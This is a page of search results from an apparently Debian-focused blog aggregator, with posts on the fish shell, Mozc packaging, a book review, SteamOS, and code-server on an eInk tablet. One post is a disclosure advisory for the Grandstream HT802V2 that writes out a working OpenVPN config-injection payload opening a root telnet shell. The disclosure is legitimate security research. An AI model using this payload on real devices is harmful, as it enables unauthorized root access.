Search Results: "lowe"

28 February 2025

Antoine Beaupré: testing the fish shell

I have been testing fish for a couple of months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and these are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer than you have lived. I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tcsh(1), but that was in another millennium). My normal shell is bash(1), and it's still the shell I use everywhere other than my laptop, as I haven't switched on all the servers I manage, although fish has been available on torproject.org servers since August 2022. I first got interested in fish because it was ported to Rust, making it one of the rare shells out there written in a "safe" and modern programming language; the port shipped as Fish 4.0 after an impressive ~2 years of work.

Cool things

  • The current directory gets shortened: ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland.
  • Autocompletion rocks.
  • The default prompt rocks. It doesn't seem vulnerable to command injection attacks; at least it doesn't trip on the git-landmine. It even includes pipe status output, which was a huge pain to implement in bash. It made me realize that if the last command succeeds, we don't see other failures, which is the case with my current prompt anyway! Signal reporting is better than my bash implementation too. So far the only modification I have made to the prompt is to add a printf '\a' to output a bell.
  • By default, fish keeps a directory history (separate from the pushd stack) that can be navigated with cdh, prevd, and nextd; dirh shows the history.

Less cool

  • I feel there's visible latency in the prompt creation.
  • POSIX-style functions (foo() { true; }) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:
function foo
    true
end
This means my (modest) collection of POSIX functions needs to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions); see the sketch after this list.
  • EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful.
  • Process substitution is split on newlines, not whitespace; you need to pipe through string split -n " " to get the equivalent.
  • <(cmd) doesn't exist: they claim you can use cmd | foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character meaning "read from stdin".
  • Documentation is... limited. It seems mostly geared toward the web docs, which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), and this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!).
  • Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
... but it's actually one line; when you copy-paste the above in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Note that this is an issue specific to foot(1); alacritty(1) and gnome-terminal(1) don't suffer from it. I have already filed it upstream in foot and it is apparently fixed already.
  • Globbing is driving me nuts. You can't pass a * to a command unless fish agrees it's going to match something. You need to escape it if it doesn't immediately match, and then you need the called command to actually support globbing. 202[345] doesn't match folders named 2023, 2024, 2025; it will send the literal string 202[345] to the command.
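As a sketch of the workarounds mentioned above (the function name and directories are made up, not from the original post): a small POSIX helper becomes a fish function or alias, and a bracket range can be emulated by globbing with * and filtering with a regex:

function gg
    # POSIX `gg() { git grep -n "$1"; }` ported to fish
    git grep -n $argv
end
# or, since fish implements aliases as functions anyway:
alias gg='git grep -n'

# 202[345] is not globbed by fish, so expand with * and filter:
for d in 202*
    string match -qr '^202[345]$' -- $d; and echo $d
end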

Blockers

  • () is like $(): it's process substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something ) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this (see the sketch at the end of this list), but ouch. This wouldn't be so bad if it were just for cd, though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py ) | sort -u
Turn into what I find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end | sort -u
It... works, but it goes back to "oh dear, now there's a new language again". I only found out about this construct while trying:
{ git grep -l '^#!/.*bin/python' ; fdfind .py } | sort -u
... which fails and suggests using begin/end, at which point: why not just support the curly braces?
  • FOO=bar is not allowed. It's actually recognized syntax, but creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from the standard.
  • Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as function definitions, and \ is not magical there. This can be worked around by specifying the full path to the command, e.g. alias mv="/bin/mv -i".
  • Another problem is trying to override a builtin, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword, so that means a lot of typing. Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges.
  • alt-. doesn't always work the way I expect.
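For reference, the pushd-based replacement for the subshell idiom mentioned at the top of this list looks something like this (foo and do_something are placeholders):

# POSIX: ( cd foo ; do_something )  -- in fish:
pushd foo
do_something
popd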

23 February 2025

Kentaro Hayashi: Short journey to Mozc 2.29.5160.102+dfsg-1

Introduction

This is just a note about how I upgraded the Mozc package last year to get it ready for the upcoming trixie release (with many restrictions). Maybe Mozc 2.29.5160.102+dfsg-1.3 will be shipped with Debian 13 (trixie).

FTBFS with Mozc 2.28.4715.102+dfsg-2.2

In May 2024, I found that Mozc had been removed from testing and was still FTBFS. (#1068186 - mozc: FTBFS with abseil 20230802: ../../base/init_mozc.cc:90:29: error: absl::debian5::flags_internal::ArgvListAction has not been declared - Debian Bug report logs.) That FTBFS had been fixed in Mozc upstream, but the fix was not applied to the package for a while; besides the upstream patch, an additional linkage patch was required. Mozc is the de facto standard input method editor for Japanese. Most Japanese users use it by default on the Linux desktop. (Even though the frontend input method framework differs, the backend engine is Mozc in most cases: uim-mozc for task-japanese-desktop, ibus-mozc for task-japanese-gnome-desktop in Debian.) There are also cases where Mozc is rebuilt locally with an integrated external dictionary to improve the vocabulary. If the FTBFS had stayed, it would have blocked such usage. So I sent patches to fix it and they were merged.

Motivation to update Mozc

While fixing #1068186, I also found that the Mozc version had not been synced to upstream for a long time. At that time, Mozc in unstable was version 2.28.4715.102+dfsg, but upstream had already released 2.30.5544.102. It seems that Mozc's maintainer was too busy and couldn't afford to update it, so I tried to do it.

The blockers for updating Mozc

But it was not such an easy task. If you wanted to package the latest Mozc, there were many blockers:
  • Newer Mozc requires Bazel to build, but there is no Bazel package that fits (there is bazel-bootstrap 4.x, but it is old; v6.x or newer is required).
  • Newer abseil and protobuf were required
  • Renderer was changed to Qt. GTK renderer was removed
  • Revise existing patchsets (e.g. for UIM, for Fcitx)
And that was not all.

Road to the latest Mozc

First, I knew about debian-bazel, so I posted there about bazel packaging progress: "Any updates about the bazel packaging effort?" Sadly there was no response. Thus, adopting Bazel as the build tool chain was not realistic; in other words, we needed to keep the GYP patch and maintain it. As another topic, upstream changed the renderer from GTK+ to Qt. Here are the major topics of each release of Mozc:
  • 2.30.5544.102 Require abseil 20240116.1 or later
  • 2.29.5544.102 GYP was deprecated
  • 2.29.5374.102
  • 2.29.5268.102 No gtk renderer anymore, need Qt.
  • 2.29.5160.102
    • The last version where the gtk renderer is available.
    • --use_gyp_for_ibus_build option was removed.
  • 2.28.5029.102
  • 2.28.4880.102
  • 2.28.4715.102+dfsg (the version in Debian sid)
The internal renderer change was too big, and even before GYP's deprecation in 2.29.5544.102, GYP support had already been removed gradually. As a result, targeting 2.29.5160.102 was the practical approach to move things forward.

Revisit existing patchsets for 2.28.4715.102+dfsg

Second, I needed to revisit the existing patchset and triage it:
  • 0001-Update-uim-mozc-to-c979f127acaeb7b35d3344e8b1e40848e.patch
    • Required
  • 0002-Support-fcitx.patch
    • Required
  • 0003-Change-compiler-from-clang-to-gcc.patch
  • 0004-Add-usage_dict.txt.patch
    • Required. (maybe)
  • 0005-Enable-verbose-build.patch
    • Required.
  • 0006-Update-gyp-using-absl.patch
    • Required and need massive refactoring.
  • 0007-common.gypi-Use-command-v-instead-of-which.patch
    • (maybe) Not needed anymore
  • 0009-protobuf.gyp-Add-latomic-to-link_settings.patch
    • Required.
  • 0010-Fix-the-compile-error-of-ParseCommandLineFlags-with.patch
    • Required. Should be merged into 0006 patch.
  • 0011-Fix-missing-abseil-gyp-link-settings.patch
    • Required. Should be merged into 0006 patch.
The UIM patch was maintained in a third-party repository whose directory structure was quite different from Mozc's. Maintenance activity there was low, so just picking changes from macuim was not enough; fixing the FTBFS required additional work. The Fcitx patch was maintained in fcitx/mozc, but that repository tracks only the master branch, so it was hard to pick a patchset for a specific version of Mozc. Finally, I managed to refresh the patchset for 2.29.5160.102:
  • support-uim.patch
  • support-fcitx.patch
  • change-compiler-from-clang-to-gcc.patch
  • add-japanese-usage-dictionary.patch
  • enable-verbose-build.patch
  • update-gyp-using-system-abseil.patch
  • gyp-using-command-instead-of-which.patch
  • gyp-protobuf-link-with-atomic.patch
  • enable-deprecated-gtk-renderer.patch
  • fix-compile-error-of-ParseCommandLineFlags.patch
  • enable-use_gyp_for_ibus_build-again.patch
  • ibus-drop-needless-client_mock.patch
  • protobuf-revert-internal-cleanup.patch
  • uim-mozc-fix-ftbfs.patch

Improve packaging task

Mozc needs to be repacked, but it didn't use Files-Excluded yet. So I introduced d/watch to repack the upstream source. It makes the source package more reproducible.
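As a sketch of how these pieces fit together (the URL pattern and excluded path below are illustrative, not the actual Mozc ones): uscan reads d/watch, downloads the upstream tarball, and strips the paths listed under Files-Excluded in debian/copyright while repacking:

# debian/watch (illustrative sketch)
version=4
opts="repack,repacksuffix=+dfsg,dversionmangle=s/\+dfsg$//" \
  https://github.com/google/mozc/tags .*/archive/refs/tags/v?([\d.]+)\.tar\.gz

# debian/copyright (illustrative excerpt)
# Files-Excluded: src/third_party/some-bundled-lib/*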

OT: Hardware breakage

There was another blocker for this task: I hit a situation where g++ randomly caused a SEGV while building Mozc. At first I wondered why it failed, but digging further I finally found that a memory module was corrupted. Thus I lost 32GB of memory modules. :-<

Unexpected behaviour in uim-mozc

When I uploaded Mozc 2.29.5160.102+dfsg-1 to experimental, I found a case where uim-mozc behaves weirdly: the candidate words were shown with flickering. But it was not a regression in this upload; uim-mozc with Wayland causes that problem. Thus GNOME and derivatives might not be affected because ibus-mozc is used there.

Mozc 2.29.5160.102+dfsg-1

As the patchset had matured, I uploaded 2.29.5160.102+dfsg-1 with the --delayed 15 option:
$ dput --delayed 15 mozc_2.29.5160.102+dfsg-1_source.changes
Uploading mozc using ftp to ftp-master (host: ftp.upload.debian.org; directory: /pub/UploadQueue/DELAYED/15-day)
running allowed-distribution: check whether a local profile permits uploads to the target distribution
running protected-distribution: warn before uploading to distributions where a special policy applies
running checksum: verify checksums before uploading
running suite-mismatch: check the target distribution for common errors
running gpg: check GnuPG signatures before the upload
 signfile dsc mozc_2.29.5160.102+dfsg-1.dsc 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_buildinfo mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
 signfile buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_changes dsc mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_source.changes
 fixup_changes buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo mozc_2.29.5160.102+dfsg-1_source.changes
 signfile changes mozc_2.29.5160.102+dfsg-1_source.changes 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
Successfully signed dsc, buildinfo, changes files
Uploading mozc_2.29.5160.102+dfsg-1.dsc
Uploading mozc_2.29.5160.102+dfsg-1.debian.tar.xz
Uploading mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
Uploading mozc_2.29.5160.102+dfsg-1_source.changes
Mozc 2.29.5160.102+dfsg-1 landed in unstable on 2024-12-20.

Additional bug fixes

Additionally, the following bugs were also fixed; these fixes went into 2.29.5160.102+dfsg-1.1. Furthermore, I found that salsa CI succeeds even when the pristine-tar branch commit is missing. I sent an MR for this issue and it has already been merged.

Mozc and future in Debian

In this short journey, I gave up on updating to an even newer Mozc because the versions of the dependency libraries had not been updated. Note that protobuf 3.25.4 in experimental depends on the older absl 20230802, so it must be rebuilt against absl 20240722.0. Furthermore, we need to consider how to migrate from the GTK renderer to the Qt renderer in the future.

12 February 2025

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5, and while playing around with the VPN settings I realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with one of a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" into one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more spaces, followed by the option name (up, down, etc.), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters but works just as well for option names. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
This will still be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it, and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices

Fix

After disclosing this issue to Grandstream, they issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block.

Timeline

10 February 2025

Russ Allbery: Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stands alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book.

Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder.

Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem.

So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS.
"Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?"
"Oh, no, I am not missing this," Isla said, and got out of the podcar.
"I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun.

The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments.

We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well.

There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into.

There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts.

Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended.

Followed by Ghostdrift.

Rating: 9 out of 10

5 February 2025

Alberto García: Keeping your system-wide configuration files intact after updating SteamOS

Introduction

If you use SteamOS and you like to install third-party tools or modify the system-wide configuration, some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know, SteamOS uses an immutable root filesystem, and users are not expected to modify it because all changes are lost after an OS update. However, this does not include configuration files: the /etc directory is not part of the root filesystem itself. Instead, it's a writable overlay, and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem, such as logs, cached data, etc).

/etc contains important data that is specific to that particular machine, like the configuration of known network connections, the password of the main user, and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However, the update process also needs to make sure that other changes to /etc don't conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update.

SteamOS 3.6 introduced a new mechanism to decide what to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded [1].

However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately, the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept. There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism, you can have a look at the DeterminateSystems Nix installer: https://github.com/DeterminateSystems/nix-installer/blob/v0.34.0/src/planner/steam_deck.rs#L273 As usual, if you encounter issues with this or any other part of the system, you can check the SteamOS issue tracker. Enjoy!
  1. A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup.

2 February 2025

Joachim Breitner: Coding on my eInk Tablet

For many years I wished I had a setup that would allow me to work (that is, code) productively outside in the bright sun. It's winter right now, but when it's summer again it's always a bit... This weekend I got closer to that goal. TL;DR: Using code-server on a beefy machine seems to be quite neat.
Passively lit coding

Personal history

Looking back at my own old blog entries I find one from 10 years ago describing how I bought a Kobo eBook reader with the intent of using it as an external monitor for my laptop. It seems that I got a proof-of-concept setup working, using VNC, but it was tedious to set up, and I never actually used that. I subsequently noticed that the eBook reader is rather useful for reading eBooks, and it has been in heavy use for that ever since.

Four years ago I gave this old idea another shot and bought an Onyx BOOX Max Lumi. This is an A4-sized tablet running Android and had the very promising feature of an HDMI input. So hopefully I'd attach it to my laptop and it would "just work". Turns out that this never worked as well as I hoped: even if I set the resolution to exactly the tablet's screen's resolution I got blurry output, and it also drained the battery a lot, so I gave up on this. I subsequently noticed that the tablet is rather useful for taking notes, and it has been in sporadic use for that.

Going off on this tangent: I later learned that the HDMI input of this device appears to the system like a camera input, and I don't have to use Boox's monitor app but could use other apps like FreeDCam as well. This somehow managed to fix the resolution issues, but the setup still wasn't convenient enough to be used regularly.

I also played around with pure terminal approaches, e.g. SSH'ing into a system, but since my usual workflow was never purely text-based (I was at least used to using a window manager instead of a terminal multiplexer like screen or tmux) that never led anywhere either.

VSCode, working remotely

Since these attempts I have started a new job working on the Lean theorem prover, and working on or with Lean basically means using VSCode. (There is a very good neovim plugin as well, but I'm using VSCode nevertheless, if only to make sure I am dogfooding our default user experience.) My colleagues have said good things about using VSCode with the remote SSH extension to work on a beefy machine, so I gave this a try now as well, and while it's not a complete game changer for me, it does make certain tasks (rebuilding everything after switching branches, running the test suite) very convenient. And it's a bit spooky to run these workloads without the laptop's fan spinning up.

In this setup, the workspace is remote, but VSCode still runs locally. But it made me wonder about my old goal of being able to work reasonably efficiently on my eInk tablet. Can I replicate this setup there? VSCode itself doesn't run on Android directly. There are projects that run a Linux chroot or in termux on the Android system, and then you can use VNC to connect to it (e.g. on Andronix), but that did not seem promising. It seemed fiddly, and I probably should take it easy on the tablet's system.

code-server, running remotely

A more promising option is code-server. This is a fork of VSCode (actually of VSCodium) that runs completely on the remote machine, and the client machine just needs a browser. I set that up this weekend and found that I was able to do a little bit of work reasonably well.

Access

With code-server one has to decide how to expose it safely enough. I decided against the tunnel-over-SSH option, as I expected that to be somewhat tedious to set up (both initially and for each session) on the Android system, and I liked the idea of being able to use any device to work in my environment. I also decided against the more involved "reverse proxy behind proper hostname with SSL" setups, because they involve a few extra steps, and some of them I cannot do as I do not have root access on the shared beefy machine I wanted to use. That left me with code-server's built-in support for self-signed certificates and a password:
$ cat .config/code-server/config.yaml
bind-addr: 1.2.3.4:8080
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: true
With trust-on-first-use this seems reasonably secure. Update: I noticed that the browsers would forget that I trust this self-signed cert after restarting the browser, and also that I cannot install the page (as a Progressive Web App) unless it has a valid certificate. But since I don't have superuser access to that machine, I can't just follow the official recommendation of using a reverse proxy on port 80 or 443 with automatic certificates. Instead, I pointed a hostname that I control to that machine, obtained a certificate manually on my laptop (using acme.sh) and copied the files over, so the configuration now reads as follows:
bind-addr: 1.2.3.4:3933
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.cer
cert-key: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.key
(This is getting very specific to my particular needs and constraints, so I'll spare you the details.)

Service

To keep code-server running I created a systemd service that's managed by my user's systemd instance:
~ $ cat ~/.config/systemd/user/code-server.service
[Unit]
Description=code-server
After=network-online.target
[Service]
Environment=PATH=/home/joachim/.nix-profile/bin:/nix/var/nix/profiles/default/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ExecStart=/nix/var/nix/profiles/default/bin/nix run nixpkgs#code-server
[Install]
WantedBy=default.target
(I am using nix as a package manager on a Debian system there, hence the additional PATH and complex ExecStart. If you have a more conventional setup then you do not have to worry about Environment and can likely use ExecStart=code-server.) For this to survive me logging out I had to ask the system administrator to run loginctl enable-linger joachim, so that systemd allows my jobs to linger.
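With the unit file in place, the service is managed like any other user unit; something along these lines:

# reload the user manager and start the service now and at login
systemctl --user daemon-reload
systemctl --user enable --now code-server.service
# run by an administrator, so user services survive logout
loginctl enable-linger joachim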

Git credentials

The next issue to be solved was how to access the git repositories. The work is all on public repositories, but I still need a way to push my work. With the classic VSCode-SSH-remote setup from my laptop, this is no problem: my local SSH key is forwarded using the SSH agent, so I can seamlessly use that on the other side. But with code-server there is no SSH key involved. I could create a new SSH key and store it on the server. That did not seem appealing, though, because SSH keys on GitHub always have full access. It wouldn't be horrible, but I still wondered if I could do better. I thought of creating fine-grained personal access tokens that only allow me to push code to specific repositories, and nothing else, and just storing them permanently on the remote server. Still a neat and convenient option, but creating PATs for our org requires approval and I didn't want to bother anyone on the weekend. So I am experimenting with GitHub's git-credential-manager now. I have configured it to use git's credential cache with an elevated timeout, so that once I log in, I don't have to do so again for one workday.
$ nix-env -iA nixpkgs.git-credential-manager
$ git-credential-manager configure
$ git config --global credential.credentialStore cache
$ git config --global credential.cacheOptions "--timeout 36000"
To log in, I have to visit https://github.com/login/device on an authenticated device (e.g. my phone) and enter an 8-character code. Not too shabby in terms of security. I only wish that webpage would not require me to press Tab after each character... This still grants rather broad permissions to the code-server, but at least only temporarily.

Android setup

On the client side I could now open https://host.example.com:8080 in Firefox on my eInk Android tablet, click through the warning about self-signed certificates, log in with the fixed password mentioned above, and start working! I switched to a theme that supposedly is eInk-optimized (eInk by Mufanza). It's not perfect (e.g. git diffs are unhelpful because it is not possible to distinguish deleted from added lines), but it's a start. There are more eInk themes on the official Visual Studio Marketplace, but because code-server is a fork it cannot use that marketplace, and for example this theme isn't on Open-VSX.

For some reason the F11 key doesn't work, but going fullscreen is crucial, because screen estate is scarce in this setup. I can go fullscreen using VSCode's command palette (Ctrl-P) and invoking the command there, but Firefox often jumps out of the fullscreen mode, which is annoying. I still have to pay attention to when that's happening; maybe it's the Esc key, which I am of course using a lot due to my vim bindings.

A more annoying problem was that on my Boox tablet, sometimes the on-screen keyboard would pop up, which is seriously annoying! It took me a while to track this down: the Boox has two virtual keyboards installed, the usual Google AOSP keyboard and the Onyx Keyboard. The former is clever enough to stay hidden when there is a physical keyboard attached, but the latter isn't. Moreover, pressing Shift-Ctrl on the physical keyboard rotates through the virtual keyboards. Now, VSCode has many keyboard shortcuts that require Shift-Ctrl (especially on an eInk device, where you really want to avoid using the mouse). And the limited settings exposed by the Boox Android system do not allow you to configure that or disable the Onyx keyboard! To solve this, I had to install the KISS Launcher, which allows me to see more Android settings, and in particular to disable the Onyx keyboard. So this is fixed.

I was hoping to improve the experience even more by opening the web page as a Progressive Web App (PWA), as described in the code-server FAQ. Unfortunately, that did not work. Firefox on Android did not recognize the site as a PWA (even though it recognizes a PWA test page). And I couldn't use Chrome either because (unlike Firefox) it would not consider a site with a self-signed certificate as a secure context, and then code-server does not work fully. Maybe this is just some bug that gets fixed in later versions.

